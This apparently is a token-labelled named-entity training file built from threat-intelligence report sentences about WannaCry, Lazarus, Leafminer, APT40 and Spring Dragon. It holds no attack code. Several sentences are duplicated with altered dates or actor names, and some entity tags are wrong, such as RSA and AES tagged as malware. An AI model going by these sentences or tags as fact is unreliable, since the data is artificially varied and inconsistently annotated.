+resemblance O
+to O
+a O
+previous O
+2017 S-TIME
+Lazarus B-ACT
+attack E-ACT
+, O
+analyzed O
+by O
+BAE B-SECTEAM
+Systems E-SECTEAM
+, O
+against O
+targets O
+in O
+Asia S-LOC
+. O
+
+WannaCry S-MAL
+utilizes O
+EternalBlue S-VULNAME
+by O
+crafting O
+a O
+custom O
+SMB S-MAL
+session O
+request O
+with O
+hard-coded O
+values O
+based O
+on O
+the O
+target O
+system O
+. O
+
+Notably O
+, O
+after O
+the O
+first O
+SMB B-ACT
+packet E-ACT
+sent O
+to O
+the O
+victim O
+'s O
+IP S-PROT
+address O
+, O
+WannaCry S-MAL
+sends O
+two O
+additional O
+packets O
+to O
+the O
+victim O
+containing O
+the O
+hard-coded O
+IP S-PROT
+addresses O
+192.168.56.20 O
+and O
+172.16.99.5 O
+. O
+
+WannaCry S-MAL
+( O
+also O
+known O
+as O
+WCry S-MAL
+or O
+WanaCryptor S-MAL
+) O
+malware O
+is O
+a O
+self-propagating O
+( O
+worm-like O
+) O
+ransomware S-MAL
+that O
+spreads O
+through O
+internal O
+networks O
+and O
+over O
+the O
+public O
+internet O
+by O
+exploiting O
+a O
+vulnerability O
+in O
+Microsoft S-IDTY
+'s O
+Server B-TOOL
+Message I-TOOL
+Block E-TOOL
+( O
+SMB S-TOOL
+) O
+protocol O
+, O
+MS17-010 O
+. O
+
+The O
+WannaCry S-MAL
+malware S-MAL
+consists O
+of O
+two O
+distinct O
+components O
+, O
+one O
+that O
+provides O
+ransomware O
+functionality O
+and O
+a O
+component O
+used O
+for O
+propagation O
+, O
+which O
+contains O
+functionality O
+to O
+enable O
+SMB S-MAL
+exploitation O
+capabilities O
+. O
+
+WannaCry S-MAL
+leverages O
+an O
+exploit S-VULNAME
+, O
+codenamed O
+" O
+EternalBlue S-VULNAME
+" O
+, O
+that O
+was O
+released O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+on O
+April B-TIME
+14 I-TIME
+, I-TIME
+2017 E-TIME
+. O
+
+WannaCry S-MAL
+appends O
+encrypted O
+data O
+files O
+with O
+the O
+.WCRY S-FILE
+extension O
+, O
+drops O
+and O
+executes O
+a O
+decryptor O
+tool O
+, O
+and O
+demands O
+$300 O
+or O
+$600 O
+USD O
+( O
+via O
+Bitcoin S-TOOL
+) O
+to O
+decrypt O
+the O
+data O
+. O
+
+In O
+May B-TIME
+2017 E-TIME
+, O
+SecureWorks® B-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit® E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+researchers O
+investigated O
+a O
+widespread O
+and O
+opportunistic O
+WCry S-MAL
+( O
+also O
+known O
+as O
+WanaCry S-MAL
+, O
+WanaCrypt S-MAL
+, O
+and O
+Wana B-MAL
+Decrypt0r E-MAL
+) O
+ransomware B-ACT
+campaign E-ACT
+that O
+impacted O
+many O
+systems O
+around O
+the O
+world O
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+SecureWorks B-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+researchers O
+investigated O
+a O
+widespread O
+and O
+opportunistic O
+WCry B-ACT
+ransomware I-ACT
+campaign E-ACT
+that O
+impacted O
+many O
+systems O
+around O
+the O
+world O
+. O
+
+Microsoft S-IDTY
+addressed O
+the O
+SMBv1 S-TOOL
+vulnerabilities S-VULNAME
+in O
+March B-TIME
+2017 E-TIME
+with O
+Security O
+Bulletin O
+MS17-010 O
+. O
+
+The O
+worm O
+leverages O
+an O
+SMBv1 B-TOOL
+exploit S-VULNAME
+that O
+originates O
+from O
+tools O
+released O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+threat O
+group O
+in O
+April S-TIME
+. O
+
+If O
+the O
+DoublePulsar B-MAL
+backdoor E-MAL
+does O
+not O
+exist O
+, O
+then O
+the O
+SMB B-MAL
+worm E-MAL
+attempts O
+to O
+compromise O
+the O
+target O
+using O
+the O
+Eternalblue S-VULNAME
+SMBv1 S-TOOL
+exploit S-VULNAME
+. O
+
+WCry S-MAL
+uses O
+a O
+combination O
+of O
+the O
+RSA S-MAL
+and O
+AES S-MAL
+algorithms O
+to O
+encrypt O
+files O
+. O
+
+The O
+campaign O
+'s O
+use O
+of O
+an O
+SMB B-MAL
+worm E-MAL
+to O
+distribute O
+WCry S-MAL
+contributed O
+to O
+the O
+ransomware O
+'s O
+virulence O
+. O
+
+Last O
+week O
+Microsoft S-IDTY
+, O
+working O
+together O
+with O
+Facebook S-IDTY
+and O
+others O
+in O
+the O
+security B-SECTEAM
+community E-SECTEAM
+, O
+took O
+strong O
+steps O
+to O
+protect O
+our O
+customers O
+and O
+the O
+internet O
+from O
+ongoing O
+attacks O
+by O
+an O
+advanced O
+persistent O
+threat O
+actor O
+known O
+to O
+us O
+as O
+ZINC S-APT
+, O
+also O
+known O
+as O
+the O
+Lazarus B-APT
+Group E-APT
+. O
+
+Last O
+week O
+Microsoft S-IDTY
+, O
+working O
+together O
+with O
+Facebook S-IDTY
+, O
+took O
+strong O
+steps O
+to O
+protect O
+our O
+customers O
+and O
+the O
+internet O
+from O
+ongoing O
+attacks O
+by O
+the O
+Lazarus B-APT
+Group E-APT
+. O
+
+We O
+concluded O
+that O
+Lazarus B-APT
+Group E-APT
+was O
+responsible O
+for O
+WannaCry S-MAL
+, O
+a O
+destructive O
+malware O
+. O
+
+We O
+concluded O
+that O
+Lazarus B-APT
+Group E-APT
+was O
+responsible O
+for O
+WannaCry S-MAL
+, O
+a O
+destructive O
+attack O
+in O
+May S-TIME
+that O
+targeted O
+Microsoft B-IDTY
+customers E-IDTY
+. O
+
+Today O
+, O
+the O
+governments S-IDTY
+of O
+the O
+United B-LOC
+States E-LOC
+, O
+United B-LOC
+Kingdom E-LOC
+, O
+Australia S-LOC
+, O
+Canada S-LOC
+, O
+New B-LOC
+Zealand E-LOC
+and O
+Japan S-LOC
+have O
+all O
+announced O
+that O
+the O
+government O
+of O
+North B-LOC
+Korea E-LOC
+is O
+responsible O
+for O
+the O
+activities S-ACT
+of O
+ZINC/Lazarus S-APT
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+Secureworks B-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit™ E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+researchers O
+discovered O
+the O
+North B-LOC
+Korean E-LOC
+cyber O
+threat O
+group O
+, O
+known O
+as O
+Lazarus B-APT
+Group E-APT
+and O
+internally O
+tracked O
+as O
+NICKEL B-APT
+ACADEMY E-APT
+by O
+Secureworks S-SECTEAM
+, O
+had O
+launched O
+a O
+malicious B-ACT
+spearphishing I-ACT
+campaign E-ACT
+using O
+the O
+lure O
+of O
+a O
+job O
+opening O
+for O
+the O
+CFO O
+role O
+at O
+a O
+European-based S-LOC
+cryptocurrency B-IDTY
+company E-IDTY
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+CTU S-SECTEAM
+researchers O
+discovered O
+the O
+North B-LOC
+Korean E-LOC
+cyber O
+threat O
+group O
+, O
+known O
+as O
+Lazarus B-APT
+Group E-APT
+, O
+had O
+launched O
+a O
+malicious B-ACT
+spearphishing I-ACT
+campaign E-ACT
+using O
+the O
+lure O
+of O
+a O
+job O
+opening O
+for O
+the O
+CFO O
+role O
+at O
+a O
+European-based S-LOC
+cryptocurrency B-IDTY
+company E-IDTY
+. O
+
+Bankshot S-MAL
+is O
+designed O
+to O
+persist O
+on O
+a O
+victim O
+'s O
+network O
+for O
+further O
+exploitation O
+; O
+thus O
+the O
+Advanced B-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+believes O
+this O
+operation O
+is O
+intended O
+to O
+gain O
+access O
+to O
+specific O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+CTU S-SECTEAM
+researchers O
+assess O
+this O
+as O
+the O
+continuation O
+of O
+activity O
+first O
+observed O
+in O
+2016 S-TIME
+, O
+and O
+it O
+is O
+likely O
+that O
+the O
+campaign O
+is O
+ongoing O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+NICKEL B-APT
+ACADEMY E-APT
+( O
+Lazarus S-APT
+) O
+copying O
+and O
+pasting O
+job O
+descriptions O
+from O
+online O
+recruitment O
+sites O
+in O
+previous O
+campaigns S-ACT
+. O
+
+There O
+are O
+several O
+indicators O
+, O
+which O
+have O
+led O
+CTU S-SECTEAM
+researchers O
+to O
+believe O
+with O
+high O
+confidence O
+that O
+NICKEL B-APT
+ACADEMY E-APT
+is O
+behind O
+the O
+current O
+spearphishing B-ACT
+campaign E-ACT
+. O
+
+CTU S-SECTEAM
+researchers O
+also O
+identified O
+components O
+in O
+the O
+custom B-MAL
+C2 I-MAL
+protocol E-MAL
+being O
+used O
+which O
+they O
+have O
+seen O
+utilized O
+by O
+Nickel B-APT
+Academy E-APT
+( O
+Lazarus S-APT
+) O
+previously O
+. O
+
+CTU S-SECTEAM
+researchers O
+also O
+identified O
+components O
+in O
+the O
+custom B-MAL
+C2 I-MAL
+protocol E-MAL
+being O
+used O
+( O
+the O
+ACT O
+in O
+which O
+the O
+malware O
+talks O
+to O
+the O
+Command O
+and O
+Control O
+Servers O
+) O
+which O
+they O
+have O
+seen O
+utilized O
+by O
+Nickel B-APT
+Academy E-APT
+( O
+Lazarus S-APT
+) O
+previously O
+. O
+
+Leafminer S-APT
+attempts O
+to O
+infiltrate O
+target O
+networks O
+through O
+various O
+means O
+of O
+intrusion O
+: O
+watering B-ACT
+hole E-ACT
+websites O
+, O
+vulnerability O
+scans O
+of O
+network B-ACT
+services E-ACT
+on O
+the O
+internet O
+, O
+and O
+brute-force B-ACT
+login E-ACT
+attempts O
+. O
+
+The O
+researchers O
+found O
+that O
+there O
+are O
+common O
+elements O
+in O
+the O
+macro O
+and O
+in O
+the O
+first- O
+stage O
+RAT S-MAL
+used O
+in O
+this O
+campaign O
+, O
+with O
+former O
+campaigns S-ACT
+of O
+the O
+NICKEL B-APT
+ACADEMY E-APT
+( O
+Lazarus S-APT
+) O
+threat O
+group O
+. O
+
+During O
+our O
+investigation O
+, O
+there O
+was O
+a O
+breakthrough O
+discovery O
+that O
+helped O
+connect O
+Leafminer S-APT
+to O
+a O
+number O
+of O
+attacks O
+observed O
+on O
+systems O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+identify O
+the O
+toolkit O
+used O
+in O
+the O
+group O
+'s O
+efforts O
+of O
+intrusion O
+, O
+lateral O
+movement O
+, O
+and O
+Exfiltration S-ACT
+. O
+
+As O
+of O
+early B-TIME
+June I-TIME
+2018 E-TIME
+, O
+the O
+server O
+hosted O
+112 O
+files O
+in O
+a O
+subdirectory O
+that O
+could O
+be O
+accessed O
+through O
+a O
+public B-MAL
+web I-MAL
+shell E-MAL
+planted O
+by O
+the O
+Leafminer S-APT
+. O
+
+As O
+of O
+early B-TIME
+June I-TIME
+2018 E-TIME
+, O
+the O
+server O
+hosted O
+112 O
+files O
+in O
+a O
+subdirectory O
+that O
+could O
+be O
+accessed O
+through O
+a O
+public B-MAL
+web I-MAL
+shell E-MAL
+planted O
+by O
+the O
+attackers S-APT
+. O
+
+The O
+Leafminer S-APT
+'s O
+post-compromise O
+toolkit O
+suggests O
+that O
+Leafminer S-APT
+is O
+looking O
+for O
+email S-TOOL
+data O
+, O
+files O
+, O
+and O
+database O
+servers O
+on O
+compromised O
+target O
+systems O
+. O
+
+Researching O
+the O
+hacker S-APT
+handle O
+MagicCoder O
+results O
+in O
+references O
+to O
+the O
+Iranian S-LOC
+hacking O
+forum O
+Ashiyane S-APT
+as O
+well O
+as O
+defacements O
+by O
+the O
+Iranian S-LOC
+hacker O
+group O
+Sun B-APT
+Army E-APT
+. O
+
+Targeted O
+regions O
+included O
+in O
+the O
+list O
+of O
+Leafminer S-APT
+are O
+Saudi B-LOC
+Arabia E-LOC
+, O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+, O
+Qatar S-LOC
+, O
+Kuwait S-LOC
+, O
+Bahrain S-LOC
+, O
+Egypt S-LOC
+, O
+Israel S-LOC
+, O
+and O
+Afghanistan S-LOC
+. O
+
+Our O
+investigation O
+of O
+Leafminer S-APT
+started O
+with O
+the O
+discovery O
+of O
+JavaScript B-MAL
+code E-MAL
+on O
+several O
+compromised B-MAL
+websites E-MAL
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+This O
+included O
+the O
+Fuzzbunch S-MAL
+framework O
+that O
+was O
+part O
+of O
+an O
+infamous O
+leak O
+of O
+exploits O
+and O
+tools O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+in O
+April B-TIME
+2017 E-TIME
+. O
+
+Leafminer S-APT
+has O
+developed O
+exploit S-VULNAME
+payloads O
+for O
+this O
+framework O
+( O
+Table O
+2 O
+) O
+that O
+deliver O
+custom O
+malware O
+through O
+attacks O
+against O
+SMB S-TOOL
+vulnerabilities S-VULNAME
+described O
+by O
+Microsoft S-IDTY
+. O
+
+The O
+EternalBlue S-VULNAME
+exploits S-VULNAME
+from O
+the O
+framework O
+received O
+worldwide O
+attention O
+after O
+being O
+used O
+in O
+the O
+ransomware B-ACT
+campaigns I-ACT
+WannaCry E-ACT
+in O
+May S-TIME
+and O
+Petya S-MAL
+/ O
+NotPetya S-MAL
+in O
+June B-TIME
+2017 E-TIME
+. O
+
+The O
+Leafminer S-APT
+operators S-APT
+use O
+EternalBlue S-VULNAME
+to O
+attempt O
+lateral O
+movement O
+within O
+target O
+networks O
+from O
+compromised O
+staging O
+servers O
+. O
+
+Symantec S-SECTEAM
+also O
+observed O
+attempts O
+by O
+Leafminer S-APT
+to O
+scan O
+for O
+the O
+Heartbleed B-VULNAME
+vulnerability E-VULNAME
+( O
+CVE-2014-0160 S-VULID
+) O
+from O
+an O
+attacker-controlled O
+IP S-PROT
+address O
+. O
+
+Furthermore O
+, O
+the O
+Leafminer S-APT
+arsenal O
+server O
+hosted O
+a O
+Python B-MAL
+script E-MAL
+to O
+scan O
+for O
+this O
+vulnerability O
+. O
+
+Another O
+intrusion O
+approach O
+used O
+by O
+Leafminer S-APT
+seems O
+a O
+lot O
+less O
+sophisticated O
+than O
+the O
+previously O
+described O
+methods O
+but O
+can O
+be O
+just O
+as O
+effective O
+: O
+using O
+specific O
+hacktools S-MAL
+to O
+guess O
+the O
+login O
+passwords O
+for O
+services O
+exposed O
+by O
+a O
+targeted O
+system O
+. O
+
+Commands O
+found O
+in O
+a O
+readme O
+text O
+that O
+was O
+stored O
+in O
+a O
+ZIP O
+archive O
+together O
+with O
+the O
+hacktool O
+THC B-MAL
+Hydra E-MAL
+in O
+Leafminer S-APT
+'s O
+tool O
+arsenal O
+represent O
+online B-ACT
+dictionary I-ACT
+attacks E-ACT
+on O
+Microsoft S-IDTY
+Exchange O
+and O
+Remote O
+Desktop O
+Protocol O
+services O
+of O
+regional O
+government O
+servers O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+Symantec S-SECTEAM
+identified O
+two O
+strains O
+of O
+custom O
+malware O
+used O
+by O
+the O
+Leafminer B-APT
+group E-APT
+: O
+Trojan.Imecab S-MAL
+and O
+Backdoor.Sorgu S-MAL
+. O
+
+Leafminer S-APT
+is O
+a O
+highly O
+active O
+group O
+, O
+responsible O
+for O
+targeting O
+a O
+range O
+of O
+organizations O
+across O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+Leafminer S-APT
+appears O
+to O
+be O
+based O
+in O
+Iran S-LOC
+and O
+seems O
+to O
+be O
+eager O
+to O
+learn O
+from O
+and O
+capitalize O
+on O
+tools O
+and O
+techniques O
+used O
+by O
+more O
+advanced O
+threat O
+actors S-APT
+. O
+
+Leafminer S-APT
+also O
+utilized O
+Process B-ACT
+Doppelganging E-ACT
+, O
+a O
+detection O
+evasion O
+technique O
+first O
+discussed O
+at O
+the O
+Black O
+Hat O
+EU O
+conference O
+last O
+year O
+. O
+
+Dragos S-SECTEAM
+has O
+identified O
+Leafminer B-APT
+group E-APT
+targeting O
+access O
+operations O
+in O
+the O
+electric B-IDTY
+utility I-IDTY
+sector E-IDTY
+. O
+
+Analysis O
+of O
+RASPITE S-APT
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+indicate O
+the O
+group O
+has O
+been O
+active O
+in O
+some O
+form O
+since O
+early O
+- O
+to O
+mid-2017 S-TIME
+. O
+
+RASPITE S-APT
+targeting O
+includes O
+entities O
+in O
+the O
+US S-LOC
+, O
+Middle B-LOC
+East E-LOC
+, O
+Europe S-LOC
+, O
+and O
+East B-LOC
+Asia E-LOC
+. O
+
+RASPITE S-APT
+overlaps O
+significantly O
+with O
+Symantec S-SECTEAM
+'s O
+Leafminer S-APT
+, O
+which O
+recently O
+released O
+a O
+report O
+on O
+the O
+group O
+'s O
+activity O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+RASPITE S-APT
+'s O
+activity O
+to O
+date O
+currently O
+focuses O
+on O
+initial O
+access O
+operations O
+within O
+the O
+electric B-IDTY
+utility I-IDTY
+sector E-IDTY
+. O
+
+This O
+means O
+that O
+the O
+Leafminer B-APT
+group E-APT
+is O
+targeting O
+electric B-IDTY
+utilities E-IDTY
+. O
+
+While O
+the O
+group O
+has O
+not O
+yet O
+demonstrated O
+an O
+ICS S-MAL
+capability O
+, O
+RASPITE S-APT
+'s O
+recent O
+targeting O
+focus O
+and O
+methodology O
+are O
+clear O
+indicators O
+of O
+necessary O
+activity O
+for O
+initial O
+intrusion O
+operations O
+into O
+an O
+IT S-IDTY
+network O
+to O
+prepare O
+the O
+ACT O
+for O
+later O
+potential O
+ICS S-MAL
+events O
+. O
+
+Active O
+since O
+at O
+least O
+2014 S-TIME
+, O
+this O
+actor S-APT
+has O
+long-standing O
+interest O
+in O
+maritime B-IDTY
+industries E-IDTY
+, O
+naval B-IDTY
+defense I-IDTY
+contractors E-IDTY
+, O
+and O
+associated O
+research B-IDTY
+institutions E-IDTY
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+Western B-LOC
+Europe E-LOC
+. O
+
+Active O
+since O
+at O
+least O
+2014 S-TIME
+, O
+the O
+Leviathan S-APT
+has O
+long-standing O
+interest O
+in O
+maritime B-IDTY
+industries E-IDTY
+, O
+naval B-IDTY
+defense I-IDTY
+contractors E-IDTY
+, O
+and O
+associated O
+research B-IDTY
+institutions E-IDTY
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+Western B-LOC
+Europe E-LOC
+. O
+
+On O
+September B-TIME
+15 E-TIME
+and O
+19 B-TIME
+, I-TIME
+2017 E-TIME
+, O
+Proofpoint S-SECTEAM
+detected O
+and O
+blocked O
+spearphishing B-ACT
+emails S-TOOL
+from O
+this O
+group O
+targeting O
+a O
+US S-LOC
+shipbuilding B-IDTY
+company E-IDTY
+and O
+a O
+US S-LOC
+university O
+research O
+center O
+with O
+military S-IDTY
+ties O
+. O
+
+The O
+attachments O
+exploited O
+CVE-2017-8759 S-VULID
+which O
+was O
+discovered O
+and O
+documented O
+only O
+five O
+days O
+prior O
+to O
+the O
+campaign O
+. O
+
+Some O
+of O
+the O
+documents S-FILE
+exploited O
+CVE-2017-0199 S-VULID
+to O
+deliver O
+the O
+payload O
+. O
+
+Between O
+August B-TIME
+2 E-TIME
+and O
+4 E-TIME
+, O
+the O
+actor S-APT
+sent O
+targeted O
+spearphishing B-ACT
+emails S-TOOL
+containing O
+malicious O
+URLs O
+linking O
+to O
+documents O
+to O
+multiple O
+defense B-IDTY
+contractors E-IDTY
+. O
+
+Between O
+August B-TIME
+2 E-TIME
+and O
+4 E-TIME
+, O
+the O
+Leviathan S-APT
+sent O
+targeted O
+spearphishing B-ACT
+emails S-TOOL
+containing O
+malicious O
+URLs O
+linking O
+to O
+documents O
+to O
+multiple O
+defense B-IDTY
+contractors E-IDTY
+. O
+
+The O
+Leviathan S-APT
+also O
+occasionally O
+used O
+macro-laden B-FILE
+Microsoft I-FILE
+Word I-FILE
+documents E-FILE
+to O
+target O
+other O
+US S-LOC
+research O
+and O
+development B-IDTY
+organizations E-IDTY
+during O
+this O
+period O
+. O
+
+The O
+period O
+between O
+November B-TIME
+2014 E-TIME
+and O
+January B-TIME
+2015 E-TIME
+marked O
+one O
+of O
+the O
+earlier O
+instances O
+in O
+which O
+Proofpoint S-SECTEAM
+observed O
+persistent O
+exploitation O
+attempts O
+by O
+this O
+actor S-APT
+. O
+
+The O
+Leviathan S-APT
+, O
+whose O
+espionage B-ACT
+activities E-ACT
+primarily O
+focus O
+on O
+targets O
+in O
+the O
+US S-LOC
+and O
+Western B-LOC
+Europe E-LOC
+with O
+military S-IDTY
+ties O
+, O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+This O
+actor S-APT
+, O
+whose O
+espionage B-ACT
+activities E-ACT
+primarily O
+focus O
+on O
+targets O
+in O
+the O
+US S-LOC
+and O
+Western B-LOC
+Europe E-LOC
+with O
+military S-IDTY
+ties O
+, O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+The O
+campaign O
+is O
+linked O
+to O
+a O
+group O
+of O
+suspected O
+Chinese S-LOC
+cyber B-APT
+espionage I-APT
+actors E-APT
+we O
+have O
+tracked O
+since O
+2013 S-TIME
+, O
+dubbed O
+TEMP.Periscope S-APT
+. O
+
+The O
+Leviathan S-APT
+generally O
+emailed O
+Microsoft B-ACT
+Excel I-ACT
+documents E-ACT
+with O
+malicious O
+macros O
+to O
+US S-LOC
+universities S-IDTY
+with O
+military S-IDTY
+interests O
+, O
+most O
+frequently O
+related O
+to O
+the O
+Navy S-IDTY
+. O
+
+The O
+current O
+campaign O
+is O
+a O
+sharp O
+escalation O
+of O
+detected O
+activity O
+since O
+summer B-TIME
+2017 E-TIME
+. O
+
+Since O
+early B-TIME
+2018 E-TIME
+, O
+FireEye S-SECTEAM
+( O
+including O
+our O
+FireEye S-SECTEAM
+as O
+a O
+Service O
+( O
+FaaS S-SECTEAM
+) O
+, O
+Mandiant B-SECTEAM
+Consulting E-SECTEAM
+, O
+and O
+iSIGHT B-SECTEAM
+Intelligence E-SECTEAM
+teams O
+) O
+has O
+been O
+tracking O
+an O
+ongoing O
+wave O
+of O
+intrusions O
+targeting O
+engineering S-IDTY
+and O
+maritime B-IDTY
+entities E-IDTY
+, O
+especially O
+those O
+connected O
+to O
+South B-LOC
+China I-LOC
+Sea E-LOC
+issues O
+. O
+
+Known O
+targets O
+of O
+the O
+Leviathan S-APT
+have O
+been O
+involved O
+in O
+the O
+maritime B-IDTY
+industry E-IDTY
+, O
+and O
+research B-IDTY
+institutes E-IDTY
+, O
+academic B-IDTY
+organizations E-IDTY
+, O
+and O
+private B-IDTY
+firms E-IDTY
+in O
+the O
+United B-LOC
+States E-LOC
+. O
+
+Active O
+since O
+at O
+least O
+2013 S-TIME
+, O
+TEMP.Periscope S-APT
+has O
+primarily O
+focused O
+on O
+maritime-related O
+targets O
+across O
+multiple O
+verticals O
+, O
+including O
+engineering B-IDTY
+firms E-IDTY
+, O
+shipping S-IDTY
+and O
+transportation S-IDTY
+, O
+manufacturing S-IDTY
+, O
+defense S-IDTY
+, O
+government B-IDTY
+offices E-IDTY
+, O
+and O
+research B-IDTY
+universities E-IDTY
+. O
+
+TEMP.Periscope S-APT
+overlaps O
+in O
+targeting O
+, O
+as O
+well O
+as O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+, O
+with O
+TEMP.Jumper S-APT
+, O
+a O
+group O
+that O
+also O
+overlaps O
+significantly O
+with O
+public O
+reporting O
+on O
+NanHaiShu S-MAL
+. O
+
+The O
+actor S-APT
+has O
+conducted O
+operations O
+since O
+at O
+least O
+2013 S-TIME
+in O
+support O
+of O
+China S-LOC
+'s O
+naval O
+modernization O
+effort O
+. O
+
+FireEye S-SECTEAM
+is O
+highlighting O
+a O
+Cyber B-ACT
+Espionage E-ACT
+operation O
+targeting O
+crucial O
+technologies O
+and O
+traditional O
+intelligence O
+targets O
+from O
+a O
+China-nexus S-LOC
+state O
+sponsored O
+actor S-APT
+we O
+call O
+APT40 S-APT
+. O
+
+The O
+Leviathan B-APT
+group E-APT
+has O
+specifically O
+targeted O
+engineering S-IDTY
+, O
+transportation S-IDTY
+, O
+and O
+the O
+defense B-IDTY
+industry E-IDTY
+, O
+especially O
+where O
+these O
+sectors O
+overlap O
+with O
+maritime O
+technologies O
+. O
+
+We O
+believe O
+APT40 S-APT
+'s O
+emphasis O
+on O
+maritime O
+issues O
+and O
+naval B-IDTY
+technology E-IDTY
+ultimately O
+support O
+China S-LOC
+'s O
+ambition O
+to O
+establish O
+a O
+blue-water O
+navy O
+. O
+
+Within O
+a O
+year O
+APT40 S-APT
+was O
+observed O
+masquerading O
+as O
+a O
+UUV O
+manufacturer O
+, O
+and O
+targeting O
+universities S-IDTY
+engaged O
+in O
+naval O
+research O
+. O
+
+APT40 S-APT
+engages O
+in O
+broader O
+regional O
+targeting O
+against O
+traditional O
+intelligence O
+targets O
+, O
+especially O
+organizations O
+with O
+operations O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+We O
+assess O
+with O
+moderate O
+confidence O
+that O
+APT40 S-APT
+is O
+a O
+state-sponsored O
+Chinese S-LOC
+Cyber B-ACT
+Espionage E-ACT
+operation O
+. O
+
+The O
+actor S-APT
+'s O
+targeting O
+is O
+consistent O
+with O
+Chinese S-LOC
+state O
+interests O
+and O
+there O
+are O
+multiple O
+technical O
+artifacts O
+indicating O
+the O
+actor S-APT
+is O
+based O
+in O
+China S-LOC
+. O
+
+Analysis O
+of O
+the O
+operational O
+times O
+of O
+the O
+group O
+'s O
+activities S-ACT
+indicates O
+that O
+it O
+is O
+probably O
+centered O
+around O
+China S-LOC
+Standard O
+TIME O
+( O
+UTC O
++8 O
+) O
+. O
+
+APT40 S-APT
+relies O
+heavily O
+on O
+web B-MAL
+shells E-MAL
+for O
+an O
+initial O
+foothold O
+into O
+an O
+organization O
+. O
+
+APT40 S-APT
+has O
+been O
+observed O
+leveraging O
+a O
+variety O
+of O
+techniques O
+for O
+initial O
+compromise O
+, O
+including O
+web O
+server O
+exploitation O
+, O
+phishing B-ACT
+campaigns E-ACT
+delivering O
+publicly O
+available O
+and O
+custom O
+backdoors O
+, O
+and O
+strategic B-ACT
+web I-ACT
+compromises E-ACT
+. O
+
+Depending O
+on O
+placement O
+, O
+a O
+Web B-TOOL
+shell E-TOOL
+can O
+provide O
+continued O
+access O
+to O
+victims O
+' O
+environments O
+, O
+re-infect O
+victim O
+systems O
+, O
+and O
+facilitate O
+lateral O
+movement O
+. O
+
+The O
+group O
+'s O
+capabilities O
+are O
+more O
+than O
+the O
+much O
+discussed O
+CVE-2012-0158 S-VULID
+exploits O
+over O
+the O
+past O
+few O
+years O
+. O
+
+A O
+paper O
+released O
+today O
+by O
+our O
+colleagues O
+at O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+presented O
+a O
+portion O
+of O
+data O
+on O
+this O
+crew O
+under O
+the O
+label O
+" O
+the O
+Lotus B-ACT
+Blossom I-ACT
+Operation E-ACT
+" O
+, O
+likely O
+named O
+for O
+the O
+debug O
+string O
+present O
+in O
+much O
+of O
+the O
+" O
+Elise S-MAL
+" O
+codebase O
+since O
+at O
+least O
+2012 S-TIME
+: O
+" O
+d:\lstudio\projects\lotus\… O
+" O
+. O
+
+Instead O
+, O
+the O
+Spring B-APT
+Dragon I-APT
+group E-APT
+is O
+known O
+to O
+have O
+employed O
+spearphish S-ACT
+exploits S-VULNAME
+, O
+strategic B-ACT
+web I-ACT
+compromises E-ACT
+, O
+and O
+watering B-ACT
+holes I-ACT
+attack E-ACT
+. O
+
+The O
+group O
+'s O
+spearphish O
+toolset O
+includes O
+PDF S-TOOL
+exploits S-VULNAME
+, O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploits S-VULNAME
+, O
+and O
+the O
+common O
+CVE-2012-0158 S-VULID
+Word S-TOOL
+exploits S-VULNAME
+including O
+those O
+generated O
+from O
+the O
+infamous O
+" O
+Tran B-MAL
+Duy I-MAL
+Linh E-MAL
+" O
+kit O
+. O
+
+The O
+Spring B-APT
+Dragon E-APT
+appears O
+to O
+have O
+rolled O
+out O
+a O
+steady O
+mix O
+of O
+exploits O
+against O
+government-related B-IDTY
+organizations E-IDTY
+in O
+VN S-LOC
+, O
+TW S-LOC
+, O
+PH S-LOC
+, O
+and O
+other O
+locations O
+over O
+the O
+past O
+few O
+years O
+. O
+
+Organizations O
+located O
+in O
+Myanmar S-LOC
+and O
+targeted O
+by O
+Spring B-APT
+Dragon E-APT
+have O
+gone O
+unmentioned O
+. O
+
+Spring B-APT
+Dragon E-APT
+'s O
+infiltration O
+techniques O
+there O
+were O
+not O
+simply O
+spearphish S-ACT
+. O
+
+The O
+download O
+name O
+was O
+" O
+Zawgyi_Keyboard_L.zip S-FILE
+" O
+, O
+and O
+it O
+dropped O
+a O
+" O
+setup.exe S-FILE
+" O
+that O
+contained O
+several O
+backdoor O
+components O
+, O
+including O
+an O
+Elise S-MAL
+" O
+wincex.dll S-FILE
+" O
+( O
+a42c966e26f3577534d03248551232f3 S-MD5
+, O
+detected O
+as O
+Backdoor.Win32.Agent.delp S-MAL
+) O
+. O
+
+While O
+this O
+particular O
+actor S-APT
+effectively O
+used O
+their O
+almost O
+worn O
+out O
+CVE-2012-0158 S-VULID
+exploits O
+in O
+the O
+past O
+, O
+Spring B-APT
+Dragon E-APT
+employs O
+more O
+involved O
+and O
+creative O
+intrusive O
+activity O
+as O
+well O
+. O
+
+The O
+well-known O
+threat O
+group O
+called O
